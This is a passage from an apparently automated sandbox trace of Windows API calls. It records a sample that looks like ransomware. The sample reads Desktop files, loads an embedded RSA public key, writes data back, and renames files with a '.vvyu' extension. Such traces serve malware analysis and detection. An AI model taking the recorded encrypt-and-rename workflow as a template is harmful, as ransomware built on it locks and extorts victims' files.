out: hHeap=0x620000) returned 1 [0192.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.240] GetCurrentThreadId () returned 0x66c [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e140 [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.241] GetCurrentThreadId () returned 0x66c [0192.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93540 [0192.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935e8 [0192.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93600 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93558 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93528 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e96a68 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e96c78 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0192.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e96e90 [0192.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96c78 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e90 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94be8 | out: hHeap=0x620000) returned 1 [0192.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.252] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x153ef, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x153ef, lpOverlapped=0x0) returned 1 [0192.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.253] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x153f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.253] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.254] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.255] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.255] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.255] CloseHandle (hObject=0x568) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e96a68 [0192.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.257] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\cmt4.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\cmt4.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\cmt4.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\cmt4.gif.vvyu")) returned 1 [0192.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.261] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.264] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c27790, ftCreationTime.dwHighDateTime=0x1d89dfb, ftLastAccessTime.dwLowDateTime=0xe80a4750, ftLastAccessTime.dwHighDateTime=0x1d89e11, ftLastWriteTime.dwLowDateTime=0xe80a4750, ftLastWriteTime.dwHighDateTime=0x1d89e11, nFileSizeHigh=0x0, nFileSizeLow=0xc0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cTaPN4HhRqe86tN.rtf", cAlternateFileName="CTAPN4~1.RTF")) returned 1 [0192.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94be8 [0192.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94be8 | out: hHeap=0x620000) returned 1 [0192.264] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\cTaPN4HhRqe86tN.rtf") returned=".rtf" [0192.264] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cTaPN4HhRqe86tN.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\ctapn4hhrqe86tn.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.265] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=3085) returned 1 [0192.265] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.268] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xbe7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.268] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.270] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.270] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xc0d, lpOverlapped=0x0) returned 1 [0192.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.271] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.273] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.273] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.273] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.273] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.273] GetLastError () returned 0x0 [0192.273] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.273] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.274] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.274] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.274] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc10) returned 0x2e96a68 [0192.274] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94be8 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94a80 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.275] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e97680 [0192.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e978a0 [0192.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e978a0 | out: hHeap=0x620000) returned 1 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93558 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93540 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 